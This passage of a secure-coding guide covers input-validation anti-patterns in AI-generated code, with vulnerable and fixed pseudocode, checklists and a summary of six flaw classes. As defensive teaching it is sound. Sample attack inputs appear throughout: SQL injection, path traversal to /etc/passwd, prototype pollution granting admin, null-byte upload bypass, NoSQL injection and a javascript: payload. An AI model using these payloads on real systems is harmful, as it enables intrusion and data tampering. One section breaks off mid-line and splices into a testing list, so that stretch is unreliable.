IV/nonce +- [ ] GCM nonces tracked to prevent reuse (or use SIV modes) +- [ ] All random values for security use CSPRNG (crypto.randomBytes, secrets module) +- [ ] No Math.random() or similar PRNGs for security +- [ ] Encryption keys are 256 bits and properly random +- [ ] No hardcoded keys in source code +- [ ] Keys derived with HKDF, PBKDF2 (600k+ iterations), or Argon2 +- [ ] Separate keys derived for different cryptographic operations +- [ ] Key rotation mechanism implemented +- [ ] Keys stored in KMS, HSM, or encrypted at rest +- [ ] Timing-safe comparison used for all secret comparisons +- [ ] HMAC used instead of hash(key+message) +- [ ] Error messages don't reveal cryptographic details (padding validity, etc.) +- [ ] No custom cryptographic algorithms—only standard, vetted primitives + +--- + +# Pattern 6: Input Validation and Data Sanitization + +**CWE References:** CWE-20 (Improper Input Validation), CWE-1286 (Improper Validation of Syntactic Correctness of Input), CWE-185 (Incorrect Regular Expression), CWE-1333 (Inefficient Regular Expression Complexity), CWE-129 (Improper Validation of Array Index) + +**Priority Score:** 21 (Frequency: 9, Severity: 7, Detectability: 5) + +--- + +## Introduction: The Foundation That AI Frequently Skips + +Input validation is the **first line of defense** against virtually all injection attacks, data corruption, and application crashes. Yet AI-generated code consistently fails to implement proper validation, treating it as an afterthought or skipping it entirely. + +**Why AI Models Skip or Fail at Input Validation:** + +1. **Training Data Focuses on "Happy Path":** Most tutorial code, documentation examples, and Stack Overflow answers demonstrate functionality with expected inputs. Validation code is often omitted for brevity, teaching AI that it's optional. + +2. **Validation Is Contextual:** Proper validation depends on business rules, data types, and downstream usage—context that AI often lacks. The model can't know that a "name" field shouldn't exceed 100 characters or that an "age" must be between 0 and 150. + +3. **Client-Side Validation Appears Complete:** AI training data often contains client-side form validation (JavaScript). The model learns these patterns but fails to understand that server-side validation is the actual security boundary. + +4. **Regex Complexity:** AI generates complex regex patterns that may be vulnerable to catastrophic backtracking (ReDoS) or miss edge cases. The model optimizes for matching expected patterns, not rejecting malicious ones. + +5. **Trust Boundary Confusion:** AI doesn't inherently understand which data sources are trustworthy. It may validate user form input but trust data from internal APIs, databases, or message queues that could also be compromised. + +6. **Type System Overconfidence:** In typed languages, AI may assume type declarations are sufficient validation, missing the need for range checks, format validation, and semantic constraints. + +**Why This Matters - The Foundation of All Injection Attacks:** + +Every major vulnerability class depends on inadequate input validation: +- **SQL Injection:** Unvalidated input in queries +- **Command Injection:** Unvalidated input in shell commands +- **XSS:** Unvalidated input rendered in HTML +- **Path Traversal:** Unvalidated file paths +- **Deserialization Attacks:** Unvalidated serialized objects +- **Buffer Overflows:** Unvalidated input lengths +- **Business Logic Bypass:** Unvalidated business constraints + +**Impact Statistics:** +- CWE-20 (Improper Input Validation) appears in OWASP Top 10 as a root cause of multiple vulnerabilities +- 42% of SQL injection vulnerabilities trace back to missing input validation (NIST NVD analysis) +- ReDoS vulnerabilities increased 143% year-over-year in npm packages (Snyk 2024) +- 67% of AI-generated validation code only validates on the client side (Security research 2025) + +--- + +## BAD Examples: Different Manifestations + +### BAD Example 1: Client-Side Only Validation + +```pseudocode +// VULNERABLE: All validation in frontend, server trusts everything + +// Frontend validation (JavaScript) +function validateForm(form): + if form.email is empty: + showError("Email required") + return false + + if not isValidEmail(form.email): + showError("Invalid email format") + return false + + if form.password.length < 8: + showError("Password must be 8+ characters") + return false + + if form.age < 0 or form.age > 150: + showError("Invalid age") + return false + + // Form is "valid", submit to server + return true + +// Backend endpoint (VULNERABLE - no validation) +function handleRegistration(request): + // AI assumes frontend validated, so just use the data + email = request.body.email // Could be anything + password = request.body.password // Could be empty + age = request.body.age // Could be -1 or 9999999 + + // Directly store in database + query = "INSERT INTO users (email, password, age) VALUES (?, ?, ?)" + database.execute(query, [email, hashPassword(password), age]) + + return {"success": true} +``` + +**Why This Is Dangerous:** +- Attackers bypass JavaScript by sending direct HTTP requests (curl, Postman, scripts) +- Browser dev tools allow modifying form data before submission +- Server receives arbitrary data with no protection +- Data integrity issues cascade through the application +- SQL injection still possible if query construction is vulnerable elsewhere + +**Attack Scenario:** +```pseudocode +// Attacker sends directly to API: +POST /api/register +Content-Type: application/json + +{ + "email": "'; DROP TABLE users; --", + "password": "", + "age": -9999999999 +} +``` + +--- + +### BAD Example 2: Partial Validation (Type but Not Range) + +```pseudocode +// VULNERABLE: Validates type exists, ignores business constraints + +function processPayment(request): + // Type checking only + if typeof(request.amount) != "number": + return error("Amount must be a number") + + if typeof(request.quantity) != "integer": + return error("Quantity must be an integer") + + // MISSING: Range validation + // amount could be negative (refund attack) + // quantity could be 0 or MAX_INT (business logic bypass) + + total = request.amount * request.quantity + chargeCustomer(request.customerId, total) + + return {"charged": total} + +// Attacker exploits: +{ + "amount": -100.00, // Negative = credit instead of charge + "quantity": 999999999, // Integer overflow potential + "customerId": "12345" +} +``` + +**Why This Is Dangerous:** +- Type validation is necessary but not sufficient +- Business logic depends on reasonable ranges +- Integer overflow can wrap to unexpected values +- Negative values can invert expected behavior +- Zero values can bypass payment or cause division errors + +--- + +### BAD Example 3: Regex Without Anchors + +```pseudocode +// VULNERABLE: Regex matches substring, not entire input + +// Email validation without anchors +EMAIL_PATTERN = "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" + +function validateEmail(email): + if regex.match(EMAIL_PATTERN, email): + return true + return false + +// This PASSES validation: +validateEmail("MALICIOUS_PAYLOAD user@example.com MALICIOUS_PAYLOAD") +// Because "user@example.com" matches somewhere in the string + +// Filename validation without anchors +SAFE_FILENAME = "[a-zA-Z0-9_-]+" + +function validateFilename(filename): + if regex.match(SAFE_FILENAME, filename): + return true + return false + +// This PASSES validation: +validateFilename("../../../etc/passwd") +// Because "etc" matches the pattern somewhere in the string +``` + +**Why This Is Dangerous:** +- Regex matches anywhere in string, not the complete input +- Injection payloads can surround or precede valid patterns +- Path traversal bypasses filename validation +- Email field can contain XSS payloads around valid address +- Common in AI-generated code which copies regex patterns without anchors + +**Fix Preview:** +```pseudocode +// SECURE: Use ^ and $ anchors to match entire input +EMAIL_PATTERN = "^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$" +SAFE_FILENAME = "^[a-zA-Z0-9_-]+$" +``` + +--- + +### BAD Example 4: ReDoS-Vulnerable Patterns + +```pseudocode +// VULNERABLE: Catastrophic backtracking regex patterns + +// Email validation with ReDoS vulnerability +// Pattern: nested quantifiers with overlapping character classes +VULNERABLE_EMAIL = "^([a-zA-Z0-9]+)*@[a-zA-Z0-9]+\.[a-zA-Z]+$" + +// Attack input: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!" +// The regex engine backtracks exponentially trying all combinations + +// URL validation with ReDoS +VULNERABLE_URL = "^(https?:\/\/)?([\da-z\.-]+)\.([a-z\.]{2,6})([\/\w \.-]*)*\/?$" + +// Attack input: long string of valid URL characters followed by invalid character +// "http://example.com/" + "a" * 30 + "!" + +// Naive duplicate word finder (common tutorial example) +DUPLICATE_WORDS = "\b(\w+)\s+\1\b" +// Can hang on: "word word word word word word word word word word!" + +function validateInput(input, pattern): + // This can hang for minutes or crash the server + return regex.match(pattern, input) +``` + +**Why This Is Dangerous:** +- Single malicious request can consume 100% CPU for minutes +- Denial of Service without requiring many requests +- AI copies these patterns from tutorials without understanding complexity +- Nested quantifiers `(a+)+`, `(a*)*`, `(a?)*` are red flags +- Overlapping character classes compound the problem + +**ReDoS Complexity Analysis:** +```pseudocode +// Pattern: (a+)+$ +// Input: "aaaaaaaaaaaaaaaaaaaaaaaaX" +// +// For 25 'a's followed by 'X': +// - The engine tries every possible way to split the 'a's between groups +// - Time complexity: O(2^n) where n is input length +// - 25 chars = 33 million+ combinations to try +// - 30 chars = 1 billion+ combinations +``` + +--- + +### BAD Example 5: Missing Null/Undefined Checks + +```pseudocode +// VULNERABLE: Assumes data structure completeness + +function processUserProfile(user): + // No null checks - any missing field crashes + fullName = user.firstName + " " + user.lastName // Crash if null + + emailDomain = user.email.split("@")[1] // Crash if email is null + + age = parseInt(user.profile.age) // Crash if profile is null + + // Process address (deeply nested) + city = user.profile.address.city.toUpperCase() // Multiple crash points + + return { + "name": fullName, + "domain": emailDomain, + "age": age, + "city": city + } + +// API returns partial data: +{ + "firstName": "John", + "lastName": null, // Could be null + "email": null, // Could be missing + "profile": { + "age": "25" + // address is missing entirely + } +} +``` + +**Why This Is Dangerous:** +- Application crashes reveal error messages to attackers +- Null pointer exceptions can leak stack traces +- Partial data from APIs, databases, or user input is common +- AI assumes training data structures are always complete +- Cascading failures when one field is null + +--- + +### BAD Example 6: Trusting Array Indices from User Input + +```pseudocode +// VULNERABLE: Using user input directly as array index + +function getItemByIndex(request): + items = ["item0", "item1", "item2", "item3", "item4"] + index = request.params.index // User-provided + + // No validation - trusts user to provide valid index + return items[index] // Out of bounds or negative index + +// Worse: Array index used for data access +function getUserData(request): + userIndex = parseInt(request.params.id) + + // Could access negative index, other users' data, or crash + return allUsersData[userIndex] + +// Object property access from user input +function getConfigValue(request): + configKey = request.params.key + + // Prototype pollution or access to __proto__, constructor + return config[configKey] +``` + +**Why This Is Dangerous:** +- Negative indices wrap to end of array in some languages +- Out-of-bounds access crashes or returns undefined behavior +- Integer overflow can produce unexpected indices +- Object property access allows prototype pollution +- `__proto__`, `constructor`, `prototype` keys can modify object behavior + +**Attack Scenarios:** +```pseudocode +// Array out of bounds: +GET /items?index=99999999 +GET /items?index=-1 + +// Prototype pollution via property access: +GET /config?key=__proto__ +GET /config?key=constructor +POST /config {"key": "__proto__", "value": {"isAdmin": true}} +``` + +--- + +## GOOD Examples: Proper Patterns + +### GOOD Example 1: Server-Side Validation Patterns + +```pseudocode +// SECURE: Comprehensive server-side validation with clear error messages + +function handleRegistration(request): + errors = [] + + // Email validation + email = request.body.email + if email is null or email is empty: + errors.append({"field": "email", "message": "Email is required"}) + else if length(email) > 254: // RFC 5321 limit + errors.append({"field": "email", "message": "Email too long"}) + else if not isValidEmailFormat(email): + errors.append({"field": "email", "message": "Invalid email format"}) + else if not isAllowedEmailDomain(email): // Business rule + errors.append({"field": "email", "message": "Email domain not allowed"}) + + // Password validation + password = request.body.password + if password is null or password is empty: + errors.append({"field": "password", "message": "Password is required"}) + else if length(password) < 12: + errors.append({"field": "password", "message": "Password must be 12+ characters"}) + else if length(password) > 128: // Prevent DoS via bcrypt + errors.append({"field": "password", "message": "Password too long"}) + else if not meetsComplexityRequirements(password): + errors.append({"field": "password", "message": "Password too weak"}) + + // Age validation (integer with business range) + age = request.body.age + if age is null: + errors.append({"field": "age", "message": "Age is required"}) + else if typeof(age) != "integer": + errors.append({"field": "age", "message": "Age must be a whole number"}) + else if age < 13: // Business rule: minimum age + errors.append({"field": "age", "message": "Must be at least 13 years old"}) + else if age > 150: // Sanity check + errors.append({"field": "age", "message": "Invalid age"}) + + // Return all errors at once (better UX than one at a time) + if errors.length > 0: + return {"success": false, "errors": errors} + + // Only process after validation passes + hashedPassword = hashPassword(password) + createUser(email, hashedPassword, age) + return {"success": true} +``` + +**Why This Is Secure:** +- Every field validated before use +- Type, format, length, and business rules all checked +- Clear, specific error messages for debugging +- All errors collected (better user experience) +- Reasonable upper bounds prevent DoS +- Validation happens server-side where client cannot bypass + +--- + +### GOOD Example 2: Schema Validation Approaches + +```pseudocode +// SECURE: Declarative schema validation with robust library + +// Define schema once, reuse everywhere +USER_REGISTRATION_SCHEMA = { + "type": "object", + "required": ["email", "password", "age", "name"], + "additionalProperties": false, // Reject unknown fields + "properties": { + "email": { + "type": "string", + "format": "email", + "maxLength": 254 + }, + "password": { + "type": "string", + "minLength": 12, + "maxLength": 128 + }, + "age": { + "type": "integer", + "minimum": 13, + "maximum": 150 + }, + "name": { + "type": "object", + "required": ["first", "last"], + "properties": { + "first": { + "type": "string", + "minLength": 1, + "maxLength": 100, + "pattern": "^[\\p{L}\\s'-]+$" // Unicode letters, spaces, hyphens, apostrophes + }, + "last": { + "type": "string", + "minLength": 1, + "maxLength": 100, + "pattern": "^[\\p{L}\\s'-]+$" + } + } + } + } +} + +function handleRegistration(request): + // Validate entire payload against schema + validationResult = schemaValidator.validate(request.body, USER_REGISTRATION_SCHEMA) + + if not validationResult.valid: + return { + "success": false, + "errors": validationResult.errors // Detailed error per field + } + + // Data is guaranteed to match schema structure and constraints + processRegistration(request.body) + return {"success": true} + +// Additional business logic validation after schema validation +function processRegistration(data): + // Schema ensures structure; now check business rules + if isEmailAlreadyRegistered(data.email): + throw ValidationError("Email already registered") + + if isCommonPassword(data.password): + throw ValidationError("Password is too common") + + createUser(data) +``` + +**Why This Is Secure:** +- Schema is declarative, easy to audit +- `additionalProperties: false` prevents unexpected data injection +- Type coercion handled consistently by library +- Unicode-aware patterns for international names +- Nested object validation built-in +- Separation of structural validation and business rules + +--- + +### GOOD Example 3: Safe Regex Patterns + +```pseudocode +// SECURE: Anchored, bounded, and ReDoS-resistant patterns + +// Email validation - anchored and bounded +// Note: Perfect email validation is complex; often better to just check format +// and verify via confirmation email +EMAIL_PATTERN = "^[a-zA-Z0-9._%+-]{1,64}@[a-zA-Z0-9.-]{1,253}\\.[a-zA-Z]{2,63}$" + +// Safe filename - anchored, limited character set, bounded length +FILENAME_PATTERN = "^[a-zA-Z0-9][a-zA-Z0-9._-]{0,254}$" + +// Safe identifier (alphanumeric + underscore, starts with letter) +IDENTIFIER_PATTERN = "^[a-zA-Z][a-zA-Z0-9_]{0,63}$" + +// URL path segment - no special characters +PATH_SEGMENT_PATTERN = "^[a-zA-Z0-9._-]{1,255}$" + +function validateWithSafeRegex(input, pattern, maxLength): + // Length check BEFORE regex (prevents ReDoS) + if input is null or length(input) > maxLength: + return false + + // Use timeout-protected regex matching if available + try: + return regexMatchWithTimeout(pattern, input, timeout = 100ms) + catch TimeoutException: + logWarning("Regex timeout on input: " + truncate(input, 50)) + return false + +// For complex patterns, use atomic groups or possessive quantifiers +// (syntax varies by regex engine) + +// VULNERABLE: (a+)+ +// SAFE: (?>a+)+ (atomic group - no backtracking into group) +// SAFE: a++ (possessive quantifier - never backtracks) + +// Alternative: Linear-time regex engines (RE2, rust regex) +// These reject patterns that could have exponential complexity +function validateWithLinearRegex(input, pattern): + // RE2 guarantees O(n) matching time + return RE2.match(pattern, input) +``` + +**Why This Is Secure:** +- All patterns anchored with `^` and `$` +- Length bounded to prevent long input attacks +- Character classes don't overlap (no `[a-zA-Z0-9]+` next to `[a-z]+`) +- No nested quantifiers that could cause backtracking +- Timeout protection as defense in depth +- Option to use linear-time regex engines + +--- + +### GOOD Example 4: Type Coercion Handling + +```pseudocode +// SECURE: Explicit type handling with safe coercion + +function parseIntegerSafe(value, min, max): + // Handle null/undefined + if value is null or value is undefined: + return {valid: false, error: "Value is required"} + + // If already integer, validate range + if typeof(value) == "integer": + if value < min or value > max: + return {valid: false, error: "Value out of range: " + min + "-" + max} + return {valid: true, value: value} + + // If string, parse carefully + if typeof(value) == "string": + // Check for valid integer string (no floats, no hex, no scientific) + if not regex.match("^-?[0-9]+$", value): + return {valid: false, error: "Invalid integer format"} + + parsed = parseInt(value, 10) // Always specify radix + + // Check for NaN (parsing failure) + if isNaN(parsed): + return {valid: false, error: "Could not parse integer"} + + // Check for overflow + if parsed < MIN_SAFE_INTEGER or parsed > MAX_SAFE_INTEGER: + return {valid: false, error: "Integer overflow"} + + // Range check + if parsed < min or parsed > max: + return {valid: false, error: "Value out of range: " + min + "-" + max} + + return {valid: true, value: parsed} + + // Reject all other types + return {valid: false, error: "Expected integer, got " + typeof(value)} + +// Usage +function handlePayment(request): + amountResult = parseIntegerSafe(request.body.amount, 1, 1000000) // 1 cent to $10,000 + if not amountResult.valid: + return error("amount: " + amountResult.error) + + quantityResult = parseIntegerSafe(request.body.quantity, 1, 100) + if not quantityResult.valid: + return error("quantity: " + quantityResult.error) + + // Safe to use validated integers + total = amountResult.value * quantityResult.value + processPayment(total) +``` + +**Why This Is Secure:** +- Explicit handling of null/undefined +- Type checking before operations +- Safe string-to-integer parsing with radix +- Overflow checking for platform limits +- Range validation for business constraints +- Clear error messages for each failure mode + +--- + +### GOOD Example 5: Whitelist Validation + +```pseudocode +// SECURE: Allowlist approach - only accept known-good values + +// For enum-like fields, use explicit allowlist +ALLOWED_COUNTRIES = ["US", "CA", "GB", "DE", "FR", "JP", "AU"] +ALLOWED_ROLES = ["user", "moderator", "admin"] +ALLOWED_SORT_FIELDS = ["name", "date", "price", "rating"] +ALLOWED_FILE_EXTENSIONS = [".jpg", ".jpeg", ".png", ".gif", ".pdf"] + +function validateCountry(input): + // Case-insensitive comparison against allowlist + normalized = input.toUpperCase().trim() + if normalized in ALLOWED_COUNTRIES: + return {valid: true, value: normalized} + return {valid: false, error: "Invalid country code"} + +function validateSortField(input): + // Exact match required + if input in ALLOWED_SORT_FIELDS: + return {valid: true, value: input} + return {valid: false, error: "Invalid sort field"} + +function validateFileUpload(filename, content): + // Extension whitelist + extension = getExtension(filename).toLowerCase() + if extension not in ALLOWED_FILE_EXTENSIONS: + return {valid: false, error: "File type not allowed"} + + // ALSO validate content type (magic bytes) + detectedType = detectFileType(content) + if detectedType.extension != extension: + return {valid: false, error: "File content doesn't match extension"} + + // Additional: check file isn't actually executable or contains script + if containsExecutableContent(content): + return {valid: false, error: "File contains disallowed content"} + + return {valid: true} + +// For SQL column/table names (cannot be parameterized) +function validateColumnName(input, allowedColumns): + if input in allowedColumns: + return input // Safe to use in query + throw ValidationError("Invalid column name") + +// Usage in query +function searchProducts(filters): + sortField = validateColumnName(filters.sortBy, ["name", "price", "created_at"]) + sortOrder = filters.order == "desc" ? "DESC" : "ASC" // Binary choice + + // Now safe to interpolate (they're from allowlist) + query = "SELECT * FROM products ORDER BY " + sortField + " " + sortOrder + return database.query(query) +``` + +**Why This Is Secure:** +- Only pre-approved values accepted +- No regex complexity or bypass potential +- Clear, auditable list of allowed values +- Easy to update when requirements change +- File validation checks both extension AND content +- SQL identifiers validated against explicit list + +--- + +### GOOD Example 6: Canonicalization Before Validation + +```pseudocode +// SECURE: Normalize input before validation to prevent bypass + +function validatePath(input): + // Step 1: Reject null bytes (used to bypass filters) + if contains(input, "\x00"): + return {valid: false, error: "Invalid character in path"} + + // Step 2: Decode URL encoding (multiple rounds to catch double-encoding) + decoded = input + for i in range(3): // Max 3 rounds of decoding + newDecoded = urlDecode(decoded) + if newDecoded == decoded: + break // No more encoding to decode + decoded = newDecoded + + // Step 3: Normalize path separators + normalized = decoded.replace("\\", "/") + + // Step 4: Resolve path (remove . and ..) + resolved = resolvePath(normalized) + + // Step 5: Check against allowed base directory + allowedBase = "/var/www/uploads/" + if not resolved.startsWith(allowedBase): + return {valid: false, error: "Path traversal detected"} + + // Step 6: Check for remaining dangerous patterns + if contains(resolved, ".."): + return {valid: false, error: "Invalid path component"} + + return {valid: true, value: resolved} + +function validateUsername(input): + // Normalize Unicode before validation + // NFC = Canonical Composition (combines characters) + normalized = unicodeNormalize(input, "NFC") + + // Check for confusable characters (homoglyphs) + if containsHomoglyphs(normalized): + return {valid: false, error: "Username contains confusable characters"} + + // Now validate the normalized form + if not regex.match("^[a-zA-Z0-9_]{3,20}$", normalized): + return {valid: false, error: "Invalid username format"} + + return {valid: true, value: normalized} + +function validateUrl(input): + // Parse URL to get components + parsed = parseUrl(input) + + if parsed is null: + return {valid: false, error: "Invalid URL"} + + // Validate scheme (allowlist) + if parsed.scheme not in ["http", "https"]: + return {valid: false, error: "Only HTTP(S) URLs allowed"} + + // Check for IP addresses (may be SSRF target) + if isIpAddress(parsed.host): + return {valid: false, error: "IP addresses not allowed"} + + // Check for internal hostnames + if parsed.host.endsWith(".internal") or parsed.host == "localhost": + return {valid: false, error: "Internal URLs not allowed"} + + // Check for credentials in URL + if parsed.username or parsed.password: + return {valid: false, error: "Credentials in URL not allowed"} + + // Reconstruct URL from parsed components (normalizes encoding) + canonicalUrl = buildUrl(parsed.scheme, parsed.host, parsed.port, parsed.path) + + return {valid: true, value: canonicalUrl} +``` + +**Why This Is Secure:** +- Multiple encoding layers decoded before validation +- Path normalization prevents traversal with `/./` or `/../` +- Unicode normalization prevents homoglyph attacks +- URL parsing validates structure before checking content +- Allowlist for URL schemes prevents `file://`, `javascript:` etc. +- SSRF protection by rejecting internal hostnames and IPs + +--- + +## Edge Cases Section + +### Edge Case 1: Unicode Normalization Issues + +```pseudocode +// DANGEROUS: Validating before normalization allows bypass + +// Attack: Using decomposed Unicode characters +// "admin" can be represented as: +// - "admin" (5 ASCII characters) +// - "admin" with combining characters: "admin" + accent marks +// - Confusables: "αdmin" (Greek alpha), "аdmin" (Cyrillic a) + +function vulnerableUsernameCheck(input): + if input == "admin": + return "Cannot register as admin" + return "OK" + +// Attacker uses: "аdmin" (Cyrillic 'а' looks like Latin 'a') +vulnerableUsernameCheck("аdmin") // Returns "OK" +// But displays as "admin" in UI! + +// SECURE: Normalize and check for confusables +function secureUsernameCheck(input): + // Step 1: Unicode normalize to NFC + normalized = unicodeNormalize(input, "NFC") + + // Step 2: Convert confusables to ASCII equivalent + ascii = convertConfusablesToAscii(normalized) + + // Step 3: Check reserved names against ASCII version + reservedNames = ["admin", "root", "system", "administrator", "support"] + if ascii.toLowerCase() in reservedNames: + return {valid: false, error: "Reserved username"} + + // Step 4: Only allow safe character set + if not isAsciiAlphanumeric(input): + return {valid: false, error: "Username must be ASCII letters and numbers"} + + return {valid: true, value: normalized} +``` + +**Detection:** Test with Unicode confusables for admin/root, combining characters, zero-width characters. + +--- + +### Edge Case 2: Null Byte Injection + +```pseudocode +// DANGEROUS: Null bytes can truncate strings in some languages + +// Filename validation bypass with null byte +filename = "malicious.php\x00.jpg" + +// In C/PHP, strcmp might only see "malicious.php\x00" +// The ".jpg" is ignored +if filename.endsWith(".jpg"): + uploadFile(filename) // Allows .php upload! + +// Path validation bypass +path = "/safe/directory/../../etc/passwd\x00/safe/suffix" +// Validation sees: ends with "/safe/suffix" - looks OK +// File system sees: "/etc/passwd" + +// SECURE: Strip null bytes first +function sanitizeInput(input): + // Remove null bytes entirely + sanitized = input.replace("\x00", "") + + // Also remove other control characters + sanitized = removeControlCharacters(sanitized) + + return sanitized + +function validateFilename(input): + sanitized = sanitizeInput(input) + + // Now validate + if sanitized != input: + return {valid: false, error: "Invalid characters in filename"} + + // Continue with extension validation + // ... +``` + +**Detection:** Test all string inputs with embedded null bytes (`\x00`, `%00`). + +--- + +### Edge Case 3: Type Confusion + +```pseudocode +// DANGEROUS: Loose type comparison leads to bypass + +// JavaScript/PHP style loose comparison +function vulnerableAuth(password): + storedHash = "0e123456789" // Some MD5 hashes start with "0e" + inputHash = md5(password) + + // In PHP: "0e123456789" == "0e987654321" is TRUE! + // Both are interpreted as 0 * 10^(number) = 0 + if inputHash == storedHash: // Loose comparison + return "Authenticated" + return "Failed" + +// Type confusion with arrays +function vulnerablePasswordReset(token): + // Expected: token = "abc123def456" + // Attack: token = {"$gt": ""} (MongoDB injection via type confusion) + + if database.findOne({"resetToken": token}): + return "Token found" + +// SECURE: Strict type checking +function secureAuth(password): + storedHash = getStoredHash(user) + inputHash = hashPassword(password) + + // Strict comparison and constant-time + if typeof(inputHash) != "string" or typeof(storedHash) != "string": + return "Failed" + + if not constantTimeEquals(inputHash, storedHash): + return "Failed" + + return "Authenticated" + +function securePasswordReset(token): + // Enforce string type + if typeof(token) != "string": + return {valid: false, error: "Invalid token format"} + + // Validate format + if not regex.match("^[a-f0-9]{64}$", token): + return {valid: false, error: "Invalid token format"} + + // Now safe to query + result = database.findOne({"resetToken": token}) + // ... +``` + +**Detection:** Test with different types: arrays, objects, numbers, booleans where strings expected. + +--- + +### Edge Case 4: Integer Overflow in Validation + +```pseudocode +// DANGEROUS: Validation passes but computation overflows + +function vulnerablePurchase(quantity, price): + // Validate ranges + if quantity < 0 or quantity > 1000000: + return error("Invalid quantity") + if price < 0 or price > 1000000: + return error("Invalid price") + + // Both pass validation, but multiplication overflows! + // quantity = 999999, price = 999999 + // total = 999998000001 (exceeds 32-bit integer) + total = quantity * price // OVERFLOW + + chargeCustomer(total) // May wrap to negative or small number + +// SECURE: Check for overflow in computation +function securePurchase(quantity, price): + // Validate individual ranges + if not isValidInteger(quantity, 1, 1000): + return error("Invalid quantity") + if not isValidInteger(price, 1, 10000000): // in cents + return error("Invalid price") + + // Check multiplication won't overflow + MAX_SAFE_TOTAL = 2147483647 // 32-bit signed max + + if quantity > MAX_SAFE_TOTAL / price: + return error("Order total too large") + + total = quantity * price // Now safe + + // Additional business validation + if total > MAX_ALLOWED_TRANSACTION: + return error("Transaction exceeds limit") + + chargeCustomer(total) + +// Alternative: Use arbitrary precision arithmetic for money +function securePurchaseWithDecimal(quantity, price): + quantityDecimal = Decimal(quantity) + priceDecimal = Decimal(price) + + total = quantityDecimal * priceDecimal // No overflow + + if total > Decimal(MAX_ALLOWED_TRANSACTION): + return error("Transaction exceeds limit") + + chargeCustomer(total) +``` + +**Detection:** Test with MAX_INT, MAX_INT-1, boundary values, and combinations that multiply to overflow. + +--- + +## Common Mistakes Section + +### Common Mistake 1: Validating Formatted Output Instead of Input + +```pseudocode +// WRONG: Validate after formatting +function displayUserData(userId): + userData = database.getUser(userId) // Raw from DB + + // Format for display + formattedName = formatName(userData.name) + formattedBio = formatBio(userData.bio) + + // Validating AFTER format - too late! + if containsHtml(formattedName): // Already formatted/escaped + return error("Invalid name") + + return template.render(formattedName, formattedBio) + +// CORRECT: Validate at input, encode at output +function saveUserData(request): + name = request.body.name + bio = request.body.bio + + // Validate raw input BEFORE storing + if not isValidName(name): + return error("Invalid name") + + if containsDangerousPatterns(bio): + return error("Invalid bio content") + + // Store validated (but not encoded) data + database.saveUser({"name": name, "bio": bio}) + +function displayUserData(userId): + userData = database.getUser(userId) + + // Encode for output context (don't validate again) + return template.render({ + "name": htmlEncode(userData.name), + "bio": htmlEncode(userData.bio) + }) +``` + +**Why This Is Wrong:** +- Validation should happen at input boundary, not output +- Formatted/encoded data may pass validation but still be dangerous +- Encoding should happen at output, specific to context +- Validation after formatting is security theater + +--- + +### Common Mistake 2: Using String Operations on Binary Data + +```pseudocode +// WRONG: String operations on binary data +function processUploadedImage(fileContent): + // Convert binary to string - CORRUPTS DATA + contentString = fileContent.toString("utf-8") + + // String operations fail on binary + if contentString.startsWith("\x89PNG"): // May not work correctly + processImage(contentString) // Corrupted! + + // Regex on binary data is meaningless + if regex.match(", javascript:alert(1) + +// 5. ReDoS testing +- For each regex, test with pattern: (valid_char * 30) + invalid_char +- Measure response time - should be < 100ms +- Exponential time indicates ReDoS vulnerability +``` + +--- + +## Security Checklist + +- [ ] All user input validated on the server side (never trust client-side only) +- [ ] Schema validation enforces expected structure (`additionalProperties: false`) +- [ ] All required fields checked for null/undefined/empty +- [ ] String lengths validated with reasonable maximums (prevents DoS) +- [ ] Numeric values validated for type, range, and overflow potential +- [ ] Arrays validated for max length and item constraints +- [ ] Enum fields validated against explicit allowlist +- [ ] All regex patterns anchored with `^` and `$` +- [ ] Regex patterns tested for ReDoS vulnerability +- [ ] Length checked BEFORE regex matching (ReDoS mitigation) +- [ ] Timeout protection on regex operations (defense in depth) +- [ ] Unicode input normalized before validation (NFC/NFKC) +- [ ] Null bytes (`\x00`, `%00`) rejected in string input +- [ ] Path inputs canonicalized and validated against allowed directories +- [ ] URL inputs parsed and validated (scheme, host, no credentials) +- [ ] File uploads validated by both extension AND content type +- [ ] Integer arithmetic checked for overflow before computation +- [ ] Type coercion explicit with proper error handling +- [ ] Validation consistent across all endpoints (centralized validators) +- [ ] Error messages helpful but don't leak validation logic details +- [ ] Validation rules documented and version controlled +- [ ] Validation tested with fuzzing and boundary values + +--- + +# Executive Summary + +## The 6 Critical Security Anti-Patterns + +This document provides comprehensive coverage of the **6 most critical and commonly occurring security vulnerabilities** in AI-generated code. Together, these patterns represent the root causes of the vast majority of security incidents in AI-assisted development. + +### Pattern Overview + +| # | Pattern | Risk Level | AI Frequency | Key Threat | +|---|---------|------------|--------------|------------| +| 1 | **Hardcoded Secrets** | Critical | Very High | Credential theft, API abuse, data breaches | +| 2 | **SQL/Command Injection** | Critical | High | Database compromise, RCE, system takeover | +| 3 | **Cross-Site Scripting (XSS)** | High | Very High | Session hijacking, account takeover, defacement | +| 4 | **Authentication/Session** | Critical | High | Complete authentication bypass, privilege escalation | +| 5 | **Cryptographic Failures** | High | Very High | Data decryption, credential exposure, forgery | +| 6 | **Input Validation** | High | Very High | Enables all other injection attacks | + +### Why These 6 Patterns Matter + +**They are interconnected:** Input validation failures enable injection attacks. Cryptographic failures expose the secrets that hardcoded credentials would have protected. Authentication weaknesses make XSS more devastating. + +**AI models struggle with all of them:** Training data contains countless examples of insecure patterns. AI models optimize for "working code" rather than "secure code." The patterns that make code secure are often invisible (environment variables, parameterized queries, proper encoding) while insecure patterns are explicit and visible. + +**They have compounding effects:** A single hardcoded secret can expose thousands of users. A single SQL injection can dump an entire database. A single XSS vulnerability can persist across sessions and users. + +--- + +# Critical Checklists: One-Line Reminders + +These condensed checklists provide quick reference for each pattern. Use during code review or before committing changes. + +## Pattern 1: Hardcoded Secrets + +| ✓ | Checkpoint | +|---|------------| +| □ | No API keys, passwords, or tokens in source files | +| □ | All secrets loaded from environment variables or secret managers | +| □ | `.env` files in `.gitignore` with `.env.example` for templates | +| □ | No secrets in logs, error messages, or URLs | +| □ | Secret scanning enabled in CI/CD pipeline | +| □ | Credentials rotated regularly and rotation is automated | + +## Pattern 2: SQL/Command Injection + +| ✓ | Checkpoint | +|---|------------| +| □ | All SQL queries use parameterized statements (no string concatenation) | +| □ | Dynamic identifiers (table/column names) validated against allowlist | +| □ | ORM queries reviewed for raw query vulnerabilities | +| □ | Shell commands avoid user input; if required, use allowlist validation | +| □ | Second-order injection checked (stored data used in queries) | +| □ | 